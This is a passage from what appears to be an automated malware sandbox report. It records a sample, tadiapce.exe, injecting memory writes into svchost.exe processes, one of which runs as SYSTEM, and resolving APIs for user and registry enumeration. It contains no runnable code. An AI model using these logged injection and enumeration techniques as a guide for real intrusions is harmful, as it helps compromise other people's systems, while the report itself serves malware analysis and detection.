| Get Address | c:\windows\system32\oleaut32.dll | function = 12, address_out = 0x76a65dee |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 7, address_out = 0x76a64680 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 9, address_out = 0x76a63eae |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 2, address_out = 0x76a64642 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _except_handler4_common, address_out = 0x76fa3e27 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = ??2@YAPAXI@Z, address_out = 0x76f8b0c9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _amsg_exit, address_out = 0x76feb2ef |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _initterm, address_out = 0x76f8c151 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x76f89894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x76f89cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _XcptFilter, address_out = 0x76fadc75 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = ??1type_info@@UAE@XZ, address_out = 0x76fd92b3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnwprintf, address_out = 0x76f8bbce |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = ??3@YAXPAX@Z, address_out = 0x76f8b0b9 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrFormatByteSizeW, address_out = 0x7720169d |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetUserEnum, address_out = 0x735c59cf |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetApiBufferFree, address_out = 0x73c113d2 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegGetValueW, address_out = 0x774d0e47 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:32:42 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11001237 |
|
1 | |
| Get Time | type = Performance Ctr, time = 22777403885 |
|
1 |
Process #34: svchost.exe
62
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:02:34, Reason: Child Process |
| Unmonitor | End Time: 00:02:37, Reason: Crashed |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa60 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | ZGW5TDPU\2XC7u663GxWc |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
A94
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
62 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10001000, size = 10240 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 3584 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10005000, size = 1004 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10005000, size = 512 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10006000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x70000, size = 12 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 17 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x70000, size = 16 |
|
45 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004018, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000401c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004020, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 20 |
|
5 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004024, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 9 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004028, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000402c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
5 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004030, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004034, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004038, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000403c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 25 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004040, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004044, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004048, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 24 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000404c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004050, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 19 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004054, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004058, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000405c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 27 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004060, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 6 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004064, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004068, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 28 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000406c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004000, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004004, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004008, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000400c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004010, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040cc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 16 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004080, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004084, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004088, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000408c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x1000409c, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 11 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040a8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 5 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040ac, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 7 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040b8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040bc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100040c0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004094, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004074, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10004078, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x70000, size = 1024 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100000, size = 388 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x350000, size = 40 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x9e4 | address = 0x360000, size = 20 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100000, size = 128 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x370000, size = 44 |
|
1 |
Host Behavior
Module (59)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.dll | base_address = 0x76b10000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x774c0000 |
|
1 | |
| Load | ole32.dll | base_address = 0x76cd0000 |
|
1 | |
| Load | OLEAUT32.dll | base_address = 0x76a60000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x76f80000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x771d0000 |
|
1 | |
| Load | NETAPI32.dll | base_address = 0x73c20000 |
|
1 | |
| Get Handle | c:\windows\system32\svchost.exe | base_address = 0x600000 |
|
1 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x774c0000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleW, address_out = 0x76b6374d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76b53b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x76b633d3 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WideCharToMultiByte, address_out = 0x76b6450e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapFree, address_out = 0x76b5bbd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcessHeap, address_out = 0x76b61280 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapReAlloc, address_out = 0x7739ff51 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = HeapAlloc, address_out = 0x77382dd6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x76b5d9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetModuleHandleA, address_out = 0x76b5cf41 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x76b6ed38 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x76b5cdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76b52331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x76b62fde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x76b5cac4 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentThreadId, address_out = 0x76b5bb80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount, address_out = 0x76b5ba60 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x76b5bb9f |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedCompareExchange, address_out = 0x76b5bb92 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = Sleep, address_out = 0x76b5ba46 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InterlockedExchange, address_out = 0x76b5bf0a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x76b63d01 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumKeyExW, address_out = 0x774d46c8 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegOpenKeyExW, address_out = 0x774d468d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryValueExW, address_out = 0x774d46ad |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x774d469d |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegQueryInfoKeyW, address_out = 0x774d46e7 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeSecurity, address_out = 0x76cf7259 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoCreateInstance, address_out = 0x76d19d0b |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoSetProxyBlanket, address_out = 0x76ce5ea5 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoUninitialize, address_out = 0x76d186d3 |
|
1 | |
| Get Address | c:\windows\system32\ole32.dll | function = CoInitializeEx, address_out = 0x76d109ad |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 12, address_out = 0x76a65dee |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 7, address_out = 0x76a64680 |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 9, address_out = 0x76a63eae |
|
1 | |
| Get Address | c:\windows\system32\oleaut32.dll | function = 2, address_out = 0x76a64642 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _except_handler4_common, address_out = 0x76fa3e27 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = ??2@YAPAXI@Z, address_out = 0x76f8b0c9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _amsg_exit, address_out = 0x76feb2ef |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _initterm, address_out = 0x76f8c151 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x76f89894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x76f89cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _XcptFilter, address_out = 0x76fadc75 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = ??1type_info@@UAE@XZ, address_out = 0x76fd92b3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _vsnwprintf, address_out = 0x76f8bbce |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = ??3@YAXPAX@Z, address_out = 0x76f8b0b9 |
|
1 | |
| Get Address | c:\windows\system32\shlwapi.dll | function = StrFormatByteSizeW, address_out = 0x7720169d |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetUserEnum, address_out = 0x735c59cf |
|
1 | |
| Get Address | c:\windows\system32\netapi32.dll | function = NetApiBufferFree, address_out = 0x73c113d2 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegGetValueW, address_out = 0x774d0e47 |
|
1 |
System (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-05-14 15:32:43 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 11002469 |
|
1 | |
| Get Time | type = Performance Ctr, time = 22901016553 |
|
1 |
Process #35: svchost.exe
79363
1
| Information | Value |
|---|---|
| ID | #35 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | svchost.exe |
| Initial Working Directory | C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\ |
| Monitor | Start Time: 00:03:07, Reason: Child Process |
| Unmonitor | End Time: 00:04:16, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x110 |
| Parent PID | 0x214 (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\SYSTEM |
| Enabled Privileges | SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege |
| Thread IDs |
0x
418
0x
68C
0x
7E4
0x
A3C
0x
670
0x
A34
0x
BC8
0x
CFC
0x
CF8
|
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x50000, size = 367 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x60000, size = 112 |
|
116 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x602104, size = 12 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10000000, size = 1024 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10001000, size = 343040 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10055000, size = 80384 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10069000, size = 165288 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10069000, size = 154624 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10092000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10093000, size = 512 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x10094000, size = 12288 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 26 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 12 |
|
2 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0xe0000, size = 16 |
|
113 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550b8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 21 |
|
6 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550bc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550c0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 13 |
|
15 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550c4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 14 |
|
8 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550c8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 10 |
|
7 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550cc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550d0, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 22 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550d4, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 12 |
|
14 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550d8, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 18 |
|
4 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x100550dc, size = 4 |
|
1 | |
| Modify Memory | #24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe | 0x264 | address = 0x20000, size = 15 |
